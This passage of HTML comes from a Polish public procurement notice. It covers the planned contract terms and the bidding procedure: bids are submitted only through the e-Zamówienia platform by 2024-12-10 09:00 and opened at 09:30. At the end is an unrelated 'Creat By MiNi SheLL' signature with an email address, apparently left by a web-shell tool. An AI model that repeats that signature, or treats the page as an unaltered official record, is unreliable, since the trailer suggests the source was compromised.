postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty można składać wyłącznie za pośrednictwem Platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com